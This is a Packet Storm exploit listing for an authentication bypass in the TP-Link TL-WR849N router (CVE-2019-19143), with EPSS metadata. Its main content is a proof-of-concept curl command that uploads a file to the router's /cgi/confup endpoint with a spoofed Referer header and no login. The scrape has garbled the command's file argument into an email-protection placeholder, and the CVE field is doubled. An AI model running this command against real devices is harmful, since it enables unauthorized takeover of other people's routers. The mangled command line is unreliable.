Lucene search

K
packetstormElber TavaresPACKETSTORM:156586
HistoryMar 02, 2020 - 12:00 a.m.

TP-Link TL-WR849N 0.9.1 4.16 Authentication Bypass

2020-03-0200:00:00
Elber Tavares
packetstormsecurity.com
103

0.003 Low

EPSS

Percentile

71.8%

`# Exploit Title: TL-WR849N 0.9.1 4.16 - Authentication Bypass (Upload Firmware)  
# Date: 2019-11-20  
# Exploit Author: Elber Tavares  
# Vendor Homepage: https://www.tp-link.com/  
# Software Link: https://www.tp-link.com/br/support/download/tl-wr849n/#Firmware  
# Version: TL-WR849N 0.9.1 4.16  
# Tested on: linux, windows  
# CVE : CVE-CVE-2019-19143  
  
Uploading new firmware without access to the panel  
  
REFS:  
https://github.com/ElberTavares/routers-exploit/tp-link  
https://fireshellsecurity.team/hack-n-routers/  
  
  
Poc:  
curl -i -X POST -H "Content-Type: multipart/form-data" -H "Referer:  
http://TARGET/mainFrame.htm" -F [email protected]  
http://TARGET/cgi/confup  
`

0.003 Low

EPSS

Percentile

71.8%